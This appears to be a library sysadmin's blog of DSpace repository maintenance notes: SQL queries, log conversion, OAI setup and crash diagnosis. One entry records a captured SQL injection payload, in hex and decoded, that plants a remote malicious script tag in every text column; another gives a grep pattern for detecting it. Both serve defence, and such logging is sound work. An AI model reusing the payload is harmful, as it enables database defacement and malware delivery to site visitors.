
June 26, 2009

changing feedback email in dspace

The code for creating a feedback email in dspace only allows one recipient:

Email email = ConfigurationManager.getEmail("feedback");
email.addRecipient(ConfigurationManager.getProperty("feedback.recipient"));

The code for the admin email, by contrast, allows a comma-separated list of recipients:

String AdminEmail = ConfigurationManager.getProperty("admin.emails");
String EmailsAddresses[] = AdminEmail.split(",");
for (int i = 0; i < EmailsAddresses.length; i++) {
    email.addRecipient(EmailsAddresses[i]);
}

I took parts of the admin code and applied them to the feedback part of dspace. The feedback email now supports a comma-separated list of recipients.
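The splitting step can be tried outside of dspace. The helper below is only a sketch: the class and method names (FeedbackRecipients, parseRecipients) are hypothetical and not part of the DSpace API, and it assumes the property value is a plain comma-separated string. Unlike the admin loop, it also trims whitespace and skips empty entries.

```java
import java.util.ArrayList;
import java.util.List;

final class FeedbackRecipients {
    // Split a comma-separated property value into individual addresses.
    // Hypothetical helper for illustration; not part of the DSpace API.
    static List<String> parseRecipients(String propertyValue) {
        List<String> recipients = new ArrayList<>();
        if (propertyValue == null) {
            return recipients;
        }
        for (String part : propertyValue.split(",")) {
            String address = part.trim();
            // Skip empty entries such as the one produced by "a@x.edu,,b@x.edu".
            if (!address.isEmpty()) {
                recipients.add(address);
            }
        }
        return recipients;
    }
}
```

Each returned address could then be handed to email.addRecipient(...) in place of the single feedback.recipient value.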

June 12, 2009

SQL to get number of new items in DSPACE after a certain date

select count(date_accessioned) from ItemsByDateAccessioned where date_accessioned > '2008-07-01'::DATE ;

June 2, 2009

Looking for non unicode characters in AgEcon metadata

Problem and general solution

Some non-unicode characters have gotten into the dspace metadata. We need to find them. I will print out the metadata fields to a file of the form below.

<doc> text from metadata pull </doc>

Then I will run the file through xmllint.
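As a complement to the xmllint pass, the encoding itself can be checked directly. This is a minimal sketch, assuming the metadata text is available as raw bytes; the class name Utf8Check is hypothetical. It only tests whether the bytes are valid UTF-8 and does not check XML well-formedness the way xmllint does.

```java
import java.nio.ByteBuffer;
import java.nio.charset.CharacterCodingException;
import java.nio.charset.CharsetDecoder;
import java.nio.charset.CodingErrorAction;
import java.nio.charset.StandardCharsets;

final class Utf8Check {
    // Returns true when the bytes decode cleanly as UTF-8.
    static boolean isValidUtf8(byte[] bytes) {
        // REPORT makes the decoder throw instead of silently substituting characters.
        CharsetDecoder decoder = StandardCharsets.UTF_8.newDecoder()
                .onMalformedInput(CodingErrorAction.REPORT)
                .onUnmappableCharacter(CodingErrorAction.REPORT);
        try {
            decoder.decode(ByteBuffer.wrap(bytes));
            return true;
        } catch (CharacterCodingException e) {
            return false;
        }
    }
}
```

A Latin-1 byte such as 0xE9 on its own is rejected, which is the kind of value this search is after.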

sql needed

The line below will get all the valid item_ids.
SELECT item.item_id from item, handle where handle.resource_id=item.item_id;

The line below will pull a metadata field for a given item id.
select text_value from metadatavalue where metadata_field_id=43 AND item_id=36450;
For this query, the Series/Report will be obtained for an item with item_id=36450.

Metadata fields to check

metadata_field_id name
3 author
15 date issued
25 uri
27 abstract
40 Institution/Association
43 Series/Report
57 Keyword
63 JEL Codes
64 Title
67 email
This list came from AgEconMetadata.htm

May 24, 2009

Memory Leak in DSPACE

There is a memory leak in DSPACE.
I have tried:
1) Making a more strict robots.txt file:

User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-title
Disallow: /browse-date
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author
Disallow: /*/browse-title
Disallow: /*/browse-date
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search

This change (especially the Disallow: /feed) seems to have reduced cpu load, but the leak is still there.
2) A user group suggested shutting off the string cache. I tried this, but it did not seem to help.
3) A site suggests that there is a memory leak in tomcat 5.x and that I upgrade to tomcat 6.x. I haven't done this yet.
4) I will need to look in detail at the output from hmap to determine where the trouble is. It is likely within the dspace app.

Install AgEcon on strip1

Install script for AgEcon on strip1

I wrote a shell script called deployAgEcon.sh. This has all the steps required to install a new version of AgEcon on strip1.

dspace.cfg config file

All information related to installing dspace on a given box is stored in the config file dspace.cfg. Below are versions for various boxes for both UDC and AgEcon:
UDC on strip1
AgEcon on strip1
UDC on odin (silvi003 account)
AgEcon on odin (silvi003 account)

May 13, 2009

Eric Moore's Comments on the UDC Indexer

Eric Moore wrote a great explanation of the fields that are indexed in UDC.

May 8, 2009

New robots.txt file for dspace

I am going to use the robots.txt file below. It is based on information from the dspace wiki.

User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-title
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author

The "/suggest" corresponds to a page that sends an email to a friend.

March 9, 2009

sql for rollup stats in the dspace database

A) Find all the item handles that belong to a community with a community id of 4

SELECT handle.handle FROM community2item, handle WHERE community2item.item_id = handle.resource_id AND handle.resource_type_id = 2 AND community2item.community_id = 4

B) Turning a community handle into a resource id (community id)

SELECT handle.resource_id FROM handle WHERE handle=125 AND resource_type_id=4;

resource_id
-------------
4
Note: resource_type_id=4 means community.

C) Substitute B into A -> Item handles in terms of community handle

SELECT count (handle) FROM community2item, handle WHERE community2item.item_id = handle.resource_id AND handle.resource_type_id = 2 AND community2item.community_id = (SELECT handle.resource_id FROM handle WHERE handle=125 AND resource_type_id=4);

Note: resource_type_id=2 means item.

February 25, 2009

Dspace Handles collections with problems

Summary

In UDC there are Dspace Handles that are marked as collections (resource_type_id=3) but do not show up in the collection table.

Finding the problem in the media filter log

I was looking at the filter media log, dspace-ir_filter-media.log, and found many errors of the form:

Exception in thread "main" java.lang.IllegalArgumentException: Cannot resolve 4394 to a DSpace object

This means that when the handle was passed to the static method HandleManager.resolveToObject, the result was null.

A list (handle set 1) of these handles was obtained using the UNIX command line below:

grep 'Cannot.resolve' dspace-ir_filter-media.log | perl -pe 's/^.*Cannot resolve (\d+).*$/$1/' | sort | uniq | sort -g
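The same extraction can be sketched in Java, for cases where the list needs to be fed straight into other code. The class name UnresolvedHandles is hypothetical, and the sketch assumes the log has already been read into a list of lines.

```java
import java.util.List;
import java.util.SortedSet;
import java.util.TreeSet;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

final class UnresolvedHandles {
    private static final Pattern CANNOT_RESOLVE = Pattern.compile("Cannot resolve (\\d+)");

    // Collect the distinct handle numbers from the log lines in ascending numeric order.
    static SortedSet<Integer> extract(List<String> logLines) {
        SortedSet<Integer> handles = new TreeSet<>();
        for (String line : logLines) {
            Matcher m = CANNOT_RESOLVE.matcher(line);
            if (m.find()) {
                handles.add(Integer.valueOf(m.group(1)));
            }
        }
        return handles;
    }
}
```

The TreeSet takes the place of the sort | uniq | sort -g stages of the pipeline.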

Look at handles that produce error inside of Postgres

One can go to the handle table and get the resource_id for one of the handles on the list. Using this resource_id, no entry can be found in the collection table. I think these are collections that were deleted. They were removed from the collection table but not from the handle table.

sql to get collection handles

old sql command ... pulls handles that have null and valid values in the collection table

The handles that were input to filter-media came from the sql cmd below:

SELECT handle FROM handle WHERE resource_type_id=3;

The above command will grab both good collection handles and handles that have no entry in the collection table.
The handles returned by this command make up handle set 2 (good and bad collection handles combined).

new sql command only pulls handles that have valid values in the collection table

The command below will only pull handles that have valid collection_ids (i.e. exist in the collection table).

SELECT handle FROM collection, handle WHERE collection_id=resource_id AND resource_type_id=3 ORDER BY handle::text::integer;

The handles returned by the improved command make up handle set 3 (only handles that exist in the collection table).

Quick sanity check

handle set 1 maps to null collections.
handle set 2 maps to all collections in the handle table both null and non-null.
handle set 3 maps to non-null collections

So we would expect:
1) There to be no overlap between handle set 1 and handle set 3.
2) The combined contents of handle set 1 and handle set 3 should be equal to the contents of handle set 2.
Both 1 and 2 are correct.
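The two checks are plain set operations. A minimal sketch, assuming each handle set has been loaded into a Set of integers; the class name HandleSetCheck is hypothetical.

```java
import java.util.Collections;
import java.util.Set;
import java.util.TreeSet;

final class HandleSetCheck {
    // Check 1: handle set 1 and handle set 3 share no handles.
    static boolean noOverlap(Set<Integer> set1, Set<Integer> set3) {
        return Collections.disjoint(set1, set3);
    }

    // Check 2: handle set 1 combined with handle set 3 has exactly the contents of handle set 2.
    static boolean unionMatches(Set<Integer> set1, Set<Integer> set3, Set<Integer> set2) {
        Set<Integer> union = new TreeSet<>(set1);
        union.addAll(set3);
        return union.equals(set2);
    }
}
```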

February 13, 2009

java code in dspace to get collections an item belongs to

From Item.java we find:

TableRowIterator tri = DatabaseManager.queryTable(ourContext, "collection",
        "SELECT collection.* FROM collection, collection2item WHERE " +
        "collection2item.collection_id=collection.collection_id AND " +
        "collection2item.item_id= ? ",
        itemRow.getIntColumn("item_id"));

October 14, 2008

Test media filter ... DSPACE UDC side

This media should be filtered:

http://purl.umn.edu/5842

Keywords:

Austin Catholic November physician

October 9, 2008

Check that handle.resource_id=item.item_id

The command:
SELECT handle.* from item, handle where handle.resource_id=item.item_id and handle = 2204;
yields:
handle_id handle resource_type_id resource_id
5 2204 2 2
The command:
SELECT item.* from item, handle where handle.resource_id=item.item_id and handle = 2204;
yields:
item_id submitter_id in_archive withdrawn last_modified owning_collection
2 1 t f 2007-12-13 16:53:15.767-06 1
Finally the command:
select * from itemsbytitle where item_id=2;
yields:
items_by_title_id item_id title sort_title
3727 2 xponentially growing solutions for inverse problems in PDE xponentially growing solutions for inverse problems in pde


All of this implies that the URL:
https://odin.lib.umn.edu:9031/dspace-ir/handle/2204
Will resolve to a record with the title:
xponentially growing solutions for inverse problems in PDE
This is what happens.

October 4, 2008

part of regex to find sql attacks

| grep 'DECLARE.*CHAR.*SET.*CAST' |

sql cmd for dspace

Insert dspace type logs into the University of Minho stats addon

INSERT INTO stats.log (date, logger, priority, message) VALUES
('2008-09-19 11:45:22,672', 'org.dspace.app.webui.servlet.DSpaceServlet', 'INFO',
'anonymous:session_id=85E693CBBCBD74DB561B2D2DBEDD0E2B:ip_addr=128.101.29.84:view_item:handle=2854');

Find the delta t for an item that has a handle 7113

select ('2008-03-07 21:44:01.797-06' - (select item.last_modified from item, handle where handle.resource_id=item.item_id and handle=7113));

Find handles that have been modified since epoch 1197586394

SELECT handle, EXTRACT(EPOCH FROM item.last_modified) from item, handle where handle.resource_id=item.item_id and EXTRACT(EPOCH FROM item.last_modified) > 1197586394 order by handle;
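To see what date an epoch value stands for, it can be converted with java.time. The class name EpochCheck is hypothetical. The value 1197586394 works out to 2007-12-13 22:53:14 UTC, which is 16:53:14 at a -06 offset.

```java
import java.time.Instant;

final class EpochCheck {
    // Render epoch seconds as an ISO-8601 timestamp in UTC.
    static String toUtc(long epochSeconds) {
        return Instant.ofEpochSecond(epochSeconds).toString();
    }
}
```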

Bitstream from handle

select bundle2bitstream.bitstream_id from item2bundle, handle, bundle2bitstream where (handle.handle=31045 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id);
bitstream_id
--------------
3976

handle from Bitstream

dspace_sr=> select handle.handle from item2bundle, handle, bundle2bitstream where (bundle2bitstream.bitstream_id=3976 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id);
handle
--------
31045
(1 row)

Collections that are children of a given community

SELECT handle FROM community2collection, handle WHERE community2collection.collection_id = handle.resource_id AND handle.resource_type_id = 3 AND community2collection.community_id = (SELECT resource_id FROM handle WHERE resource_type_id=4 AND handle=1);

communities that are children of a given community

SELECT handle FROM community2community, handle WHERE community2community.child_comm_id = handle.resource_id AND handle.resource_type_id = 4 AND community2community.parent_comm_id = (SELECT resource_id FROM handle WHERE resource_type_id=4 AND handle=1);

some ips that wormly uses

We are using wormly to monitor our dspace instances. The apache logs give a few of the ips that wormly uses:

apache_pattern_ip.pl -d -r '\"-\" \"\"' ageconsearch_access.log_2008-09-21
72.51.35.173 node-x2j54.wormly.com.
69.60.118.203 node-sp711.wormly.com.
125.214.66.62 node-aux9e3.wormly.com.
81.171.111.142 node4.wormly.com.
66.228.123.50 clover.wormly.com.
207.210.96.85 node3.wormly.com.


Note the perl script apache_pattern_ip.pl gives the ips of all the log entries that match the given regex.

September 30, 2008

Translating apache log format to dspace

Introduction

There are basically two types of log files that must be handled: views and downloads.

Downloads

Comparison of apache and dspace logs

From apache logs:
69.109.228.170 - - [21/Sep/2008:23:59:27 -0500] "GET /bitstream/31045/1/26020387.pdf HTTP/1.1" 200 1225483 "http://scholar.google.com/scholar?hl=en&lr=&q=accept+Genetically+modified+organism&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"

When the core of this request is sent to agecon by entering the line below into a browser:

http://ageconsearch.umn.edu/bitstream/31045/1/26020387.pdf

Catalina records the following log entry:

2008-09-30 16:12:08,153 INFO org.dspace.app.webui.servlet.BitstreamServlet @ anonymous:session_id=F82A25EDFCF0C73AE8C19291D3C3985A:ip_addr=128.101.29.84:view_bitstream:bitstream_id=3976


Required conversions

Notice that in the two log entries above, apache records a handle of 31045, while the dspace log gives a bitstream_id of 3976. To convert from apache to dspace, we must map the handle to the bitstream_id. The sql command below will do this:

select bundle2bitstream.bitstream_id from item2bundle, handle, bundle2bitstream where (handle.handle=31045 and handle.resource_id = item2bundle.item_id and bundle2bitstream.bundle_id=item2bundle.bundle_id); bitstream_id
bundle_id
-----------
3976
Note the bundle_id and the bitstream_id are the same.
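The Apache side of the conversion can be sketched as below. This is an illustration only: the class name ApacheDownloadLine is hypothetical, and it assumes the dspace log timestamp should carry the same local time as the Apache entry. It pulls out the client ip, the timestamp rewritten in the dspace log style, and the handle. The bitstream_id still has to come from the sql lookup above.

```java
import java.time.OffsetDateTime;
import java.time.format.DateTimeFormatter;
import java.util.Locale;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

final class ApacheDownloadLine {
    // Captures: client ip, bracketed timestamp, handle from "GET /bitstream/<handle>/...".
    private static final Pattern LINE = Pattern.compile(
            "^(\\S+) \\S+ \\S+ \\[([^\\]]+)\\] \"GET /bitstream/(\\d+)/");
    private static final DateTimeFormatter APACHE_TIME =
            DateTimeFormatter.ofPattern("dd/MMM/yyyy:HH:mm:ss Z", Locale.ENGLISH);
    private static final DateTimeFormatter DSPACE_TIME =
            DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss,SSS");

    // Returns {ip, dspace-style timestamp, handle}, or null when the line is not a download.
    static String[] parse(String apacheLine) {
        Matcher m = LINE.matcher(apacheLine);
        if (!m.find()) {
            return null;
        }
        OffsetDateTime when = OffsetDateTime.parse(m.group(2), APACHE_TIME);
        // The offset is dropped on output; the local wall-clock time is kept.
        return new String[] { m.group(1), when.format(DSPACE_TIME), m.group(3) };
    }
}
```

Apache records whole seconds only, so the millisecond field in the result is always 000.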

Views

Comparison of apache and dspace logs

For views we have an apache log of the form:

203.20.101.203 - - [21/Sep/2008:23:32:17 -0500] "GET /handle/22682 HTTP/1.1" 503 410 "http://scholar.google.com.au/scholar?q=%22some+implications+of+the+growth+of+the+mineral+sector%22&hl=en&um=1&ie=UTF-8&oi=scholart" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"

When the request below is put into a browser:
http://ageconsearch.umn.edu/handle/22682

We get the catalina log:

2008-09-30 16:26:30,456 INFO org.dspace.app.webui.servlet.DSpaceServlet @ anonymous:session_id=F82A25EDFCF0C73AE8C19291D3C3985A:ip_addr=128.101.29.84:view_item:handle=22682

Required conversions

To generate the dspace log format, we need to determine what was being viewed. In the case above it was a view_item.
From the handle we can find the resource_type_id, which allows us to generate terms like view_item.
select * from handle where handle=22682;
 handle_id | handle | resource_type_id | resource_id
-----------+--------+------------------+-------------
     13089 |  22682 |                2 |       12346
The table below provides a conversion between the resource_type_id and the actual type.
resource_type resource_type_id
BITSTREAM 0
BUNDLE 1
ITEM 2
COLLECTION 3
COMMUNITY 4
SITE 5
GROUP 6
EPERSON 7
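Turning a resource_type_id into a log term could be sketched as a simple lookup. The class name ViewAction is hypothetical. Only the four terms that show up in the catalina logs and matter for stats are covered, and any other type returns null.

```java
final class ViewAction {
    // Map a resource_type_id from the handle table to the action name used in the dspace log.
    static String forResourceType(int resourceTypeId) {
        switch (resourceTypeId) {
            case 0: return "view_bitstream";   // BITSTREAM (a download)
            case 2: return "view_item";        // ITEM
            case 3: return "view_collection";  // COLLECTION
            case 4: return "view_community";   // COMMUNITY
            default: return null;              // BUNDLE, SITE, GROUP, EPERSON: not handled here
        }
    }
}
```

For the handle 22682 above, resource_type_id is 2, so the term is view_item.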

September 24, 2008

Analysis of Apache/Catalina AgEcon Records for

Breakdown of log entries by type

I looked at the catalina.out log records for 2008-09-21. These logs are in the file: catalina.out_2008-09-21 (because of the way that the files are backed up, the log entries only extend to 11:30 PM). From these entries, I made a list of log entries by type: BreakDownOfAgEconLog_2008_09_21.html
It is worth noting that of the 62K hits only 20 came from "SimpleSearch". That is, only 20 users went to our search engine; the rest arrived through google or are robots.

Log types that are required for stats

Jason Roy and I agree that the following log types are needed for stats.
Log Name          Number in Log   Found Apache Match   Apache needs SQL
view_bitstream    10772           Y                    Y
view_item         4462            Y                    N
view_collection   2084            Y                    Y
view_community    582             Y                    Y
The "Apache needs SQL" column indicates whether information from the dspace SQL database is required to map the apache logs to dspace catalina logs. Also, the term "view_bitstream" corresponds to a download.

How apache logs map to catalina logs

To take care of some issues in the catalina logs, I am going to use apache logs. Here are examples of the log entries for both apache and catalina for all of the critical log types given in the table above. There are also catalina examples for almost all the types.

September 17, 2008

Why UDC crashed ... "pool exhausted" error

Jason,

Basically DSPACE does not properly close connections to the SQL server. When the pool is exhausted it generates error messages. This may be more of a problem now because OAI is available (climbing down the tree will hit the DB a lot) or there is another SQL-Injection attack, or UDC just may be more popular. I did not explore the probable increased load.

A more detailed explanation of the error is given below, with a possible fix. To set up the fix given on the web I need some privileges on strip3. I have asked CCO for them.

Jeff

1) Problem Indicated in the Logs

Starting at
2008-09-17 08:23:08,769
and ending at
2008-09-17 08:53:29,729 (When Bill restarted DSPACE).
There were 330 error messages of the type:
2008-09-17 08:53:29,729 WARN org.dspace.app.webui.servlet.DSpaceServlet @ anonymous:no_context:database_error:org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool exhausted


An error message of this sort would generate an error screen.

2) Fix from University of Michigan

In dspace-tech the University of Michigan team addresses this problem by killing processes that show the phrase 'idle in transaction' when displayed by ps.

see
http://www.mail-archive.com/dspace-tech@lists.sourceforge.net/msg01057.html

3) Confirmation that our problem matches University of Michigan's
I have checked strip3 (where the postgres database lives) and between 08:54 (When Bill restarted DSPACE) and 11:22, there have been 45 processes created that have the form:

postgres 15047 0.0 0.0 86304 4964 ? S 10:58 0:00 postgres: dspace_ir dspace_ir 134.84.135.19 idle

So we are building up these "idle" processes on the DB side, and it is likely that the system will crash again unless we put in the Michigan fix.

September 16, 2008

Properties of tomcat and apache on strip1

Here are the properties:

Using CATALINA_BASE: /opt/tomcat
Using CATALINA_HOME: /opt/tomcat
Using CATALINA_TMPDIR: /opt/tomcat/temp
Using JRE_HOME: /opt/jdk1.5.0_10
Server version: Apache Tomcat/5.5.20
Server built: Sep 12 2006 10:09:20
Server number: 5.5.20.0
OS Name: Linux
OS Version: 2.6.9-78.0.1.ELsmp
Architecture: i386
JVM Version: 1.5.0_10-b03
JVM Vendor: Sun Microsystems Inc.



Server version: Apache/2.0.52
Server built: May 9 2008 05:54:40

mod_jk/1.2.25

September 11, 2008

Bad handle in AgEcon indexer

An AgEcon patron tried to submit a file to the archive. When they did a search based on author, an error resulted. The AgEcon staff resubmitted and then deleted the old record. It looks like a bad handle got into the lucene index with the submit and then was never removed. When dspace queries lucene and finds a handle that is not in the DB, it throws an error and halts the search. Perhaps it should continue on. Here are some error logs.

September 8, 2008

OAI on odin

Activating the OAI harvester

I have enabled the OAI harvester for the dspace instance on the odin box. I needed to make the oai_dc metadata available. To do this I copied the file:

~/dspace_home/config/templates/oaicat.properties
to
~/dspace_home/config/templates/oaicat.properties

and returned the contents of this file to its original form (i.e. revision 1). Note: in this default state the file oaicat.properties has the line:
Crosswalks.oai_dc=org.dspace.app.oai.OAIDCCrosswalk uncommented.
I also removed the replace task from the build.xml file in the dspace-sr instance. Although the OAI harvester has been operational for several months, the changes mean that the dspace-ir (UDC) and the dspace-sr (AgEcon) now invoke the OAI system in an identical fashion.

Hyperlinks to call OAI verbs

Hyperlinks to development server on odin

The URL below returned all the metadata:
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc

This URL will return all the metadata since 2008-04-15:
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15

The next URL returns the data between 2008-04-15 and 2008-04-20
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-20
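The three request forms differ only in the optional from and until arguments. A small sketch of building them follows. The class name OaiRequest is hypothetical, and it assumes the dates are given as YYYY-MM-DD, so no URL encoding is needed.

```java
final class OaiRequest {
    // Build a ListRecords request URL; pass null for from or until to leave that argument out.
    static String listRecords(String baseUrl, String from, String until) {
        StringBuilder url = new StringBuilder(baseUrl)
                .append("?verb=ListRecords&metadataPrefix=oai_dc");
        if (from != null) {
            url.append("&from=").append(from);
        }
        if (until != null) {
            url.append("&until=").append(until);
        }
        return url.toString();
    }
}
```

Calling listRecords("https://odin.lib.umn.edu:9031/dspace-oai-ir/request", "2008-04-15", "2008-04-20") reproduces the last URL above.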

Hyperlinks to live box

AgEcon:
http://strip1.oit.umn.edu:8080/dspace_sr-oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30
UDC:
http://strip1.oit.umn.edu:8080/dspace_ir-oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30

Nice hyperlinks to live box

http://strip1.oit.umn.edu:8080/dspace_ir-oai/
has been aliased to
http://conservancy.umn.edu/oai

and
http://strip1.oit.umn.edu:8080/dspace_sr-oai/
has been aliased to
http://ageconsearch.umn.edu/oai/

These are much nicer to look at.

So the urls below will work.
http://conservancy.umn.edu/oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30
http://ageconsearch.umn.edu/oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30

Issues with OAI harvester on DSPACE

Elements in the AgEcon schema are not displayed

Only the AgEcon metadata that are Dublin Core are displayed by the OAI harvester
Note in the table from the link above:  
metadata_schema_id = 1 is dc schema
metadata_schema_id = 2 is agecon schema

The elements of the AgEcon schema are not displayed by the current crosswalk and a new crosswalk would have to be written.

Crosswalk is not qualified Dublin Core

The crosswalk from the dspace archive to the OAI output is Dublin Core, not qualified Dublin Core (note the metadataPrefix=oai_dc in the OAI requests above).
So the values:
 date | accessioned | Date DSpace takes possession of item.
 date | available   | Date or date range item became available to the public.
 date | issued      |

are all mapped to the tag <dc:date>. In this OAI output sample, I have pointed out which OAI <dc:date> tags correspond to the various qualified Dublin Core dates. I did an sql query on item 2 to find the actual values for the different date fields.
I could try to find a canned crosswalk from DSPACE to qualified DC. I have looked for one briefly. Several people say it would be a good thing, but I have not found anyone who has done it. It is hard to say how long this would take, and it is possible that no one has done it.

Update oaicat.jar

I did an update on oaicat.jar. It turns out that both versions of the jar work, so I stayed with the more recent version. The manifests from both jars are given here.
oaiCatMainfest.html

August 26, 2008

SQL injection attacks on dspace

We have been getting a large number of SQL injection attacks. Below is the raw hex of these attacks and the ascii translation.

Raw hex:
www.lib.umn.edu/libdata/page_print.phtml?page_id=1337'; DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x
4445434C415245204054207661726368617228323535292C4043207661
7263686172283430303029204445434C415245205461626C655F437572
736F7220435552534F5220464F522073656C65637420612E6E616D652C
622E6E616D652066726F6D207379736F626A6563747320612C73797363
6F6C756D6E73206220776865726520612E69643D622E696420616E6420
612E78747970653D27752720616E642028622E78747970653D3939206F
7220622E78747970653D3335206F7220622E78747970653D323331206F
7220622E78747970653D31363729204F50454E205461626C655F437572
736F72204645544348204E4558542046524F4D20205461626C655F4375
72736F7220494E544F2040542C4043205748494C452840404645544348
5F5354415455533D302920424547494E20657865632827757064617465
205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B
275D2B2727223E3C2F7469746C653E3C736372697074207372633D2268
7474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A
73223E3C2F7363726970743E3C212D2D272720776865726520272B4043
2B27206E6F!

ASCII:
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' no

August 25, 2008

Small changes to UDC

I. Change a simple phrase

File: ./config/language-packs/Messages.properties, line 112
OLD: jsp.collection-home.submit.button = Submit to This Collection
NEW: jsp.collection-home.submit.button = Submit another item

II. kill "Subscribe to this collection to receive daily e-mail notification of new additions" button

The file ./jsp/local/collection-home.jsp was edited to remove the button.
edits to collection-home.jsp

August 21, 2008

Exporting DSPACE repository to flat files

Export collection with handle: 33784
Export to the directory: /dspace/assetstore/ag_export/im/
Export to start at lowest member of collection : n=0

./dsrun org.dspace.app.itemexport.ItemExport -t COLLECTION -i 33784 -d /dspace/assetstore/ag_export/im/ -n 0

Subdirectories created
[silvi003@strip1 im]$ ls
0 13 18 22 27 31 36 40 45 5 54 59 63 68 72 77 81 86 90
1 14 19 23 28 32 37 41 46 50 55 6 64 69 73 78 82 87 91
10 15 2 24 29 33 38 42 47 51 56 60 65 7 74 79 83 88 92
11 16 20 25 3 34 39 43 48 52 57 61 66 70 75 8 84 89 93
12 17 21 26 30 35 4 44 49 53 58 62 67 71 76 80 85 9

Contents of the first subdirectory
[silvi003@strip1 im]$ ls 0
contents dublin_core.xml fo07he01.pdf handle
The Dublin Core in the first subdirectory

[silvi003@strip1 im]$ cat 0/dublin_core.xml
0/dublin_core.xml

July 28, 2008

Sending dspace email to a gmail account

email situation

Dspace sends me a large number of email messages. My real email gets lost in a forest of dspace messages. So I need to find every instance where silvi003@umn.edu is used and replace it with an account that I set up: dspacedump@gmail.com
So I changed:

mail.admin = silvi003@umn.edu
alert.recipient = silvi003@umn.edu

to

mail.admin = dspacedump@gmail.com
alert.recipient = dspacedump@gmail.com

in
./config/dspace.cfg

July 17, 2008

media filter UDC and cron job

Cron job

My predecessor wrote a cron job to index the contents of the pdfs in UDC. It is:
#
# Filter media
#
1 0 * * * /dspace/dspace-ir/bin/filter-media.sh > /dspace/dspace-ir/log/filter-media.log 2>&1
It was noted that this process was taking up to eight hours to run and impacting the users.
It will need to be edited and replaced.

Error record associated with the cron job

Creating search index:
Applying Media Filters
2008-02-11 08:07:19,271 
  INFO  org.dspace.core.ConfigurationManager @ DSpace logging installed using log4j.properties
Exception in thread "main" java.lang.IllegalArgumentException: Cannot resolve 4938 to a DSpace object
        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:192)
Applying Media Filters
2008-02-11 08:07:19,839 INFO  org.dspace.core.ConfigurationManager 
       @ DSpace logging installed using log4j.properties
2008-02-11 08:07:20,160 INFO  org.dspace.content.MetadataField 
       @ Loading MetadataField elements into cache.
2008-02-11 08:07:20,199 INFO  org.dspace.content.MetadataSchema @ Loading schema cache for fast finds
SKIPPED: bitstream 16263 because 'LIFE_SCIENCEs_PREDESIGN_REPORT041504_.pdf.txt' already exists
SKIPPED: bitstream 16261 because 'equine_predesign_may04.pdf.txt' already exists
SKIPPED: bitstream 16259 because 'EducationalFacilitiesPredesignStudyFinal.pdf.txt' already exists
ERROR filtering, skipping bitstream #16251 java.lang.ArrayIndexOutOfBoundsException: 4
java.lang.ArrayIndexOutOfBoundsException: 4
        at org.fontbox.cmap.CMapParser.parseNextToken(CMapParser.java:294)
        at org.fontbox.cmap.CMapParser.parse(CMapParser.java:103)
        at org.pdfbox.pdmodel.font.PDFont.parseCmap(PDFont.java:535)
        at org.pdfbox.pdmodel.font.PDFont.encode(PDFont.java:387)
        at org.pdfbox.util.PDFStreamEngine.showString(PDFStreamEngine.java:325)
        at org.pdfbox.util.operator.ShowTextGlyph.process(ShowTextGlyph.java:80)
        at org.pdfbox.util.PDFStreamEngine.processOperator(PDFStreamEngine.java:452)
        at org.pdfbox.util.PDFStreamEngine.processSubStream(PDFStreamEngine.java:215)
        at org.pdfbox.util.PDFStreamEngine.processStream(PDFStreamEngine.java:174)
        at org.pdfbox.util.PDFTextStripper.processPage(PDFTextStripper.java:336)
        at org.pdfbox.util.PDFTextStripper.processPages(PDFTextStripper.java:259)
        at org.pdfbox.util.PDFTextStripper.writeText(PDFTextStripper.java:216)
        at org.pdfbox.util.PDFTextStripper.getText(PDFTextStripper.java:149)
        at org.dspace.app.mediafilter.PDFFilter.getDestinationStream(PDFFilter.java:110)
        at org.dspace.app.mediafilter.MediaFilter.processBitstream(MediaFilter.java:155)
        at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:327)
        at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:296)
        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:266)
        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersCollection(MediaFilterManager.java:260)
        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:202)
ERROR filtering, skipping bitstream #16250 java.lang.ArrayIndexOutOfBoundsException
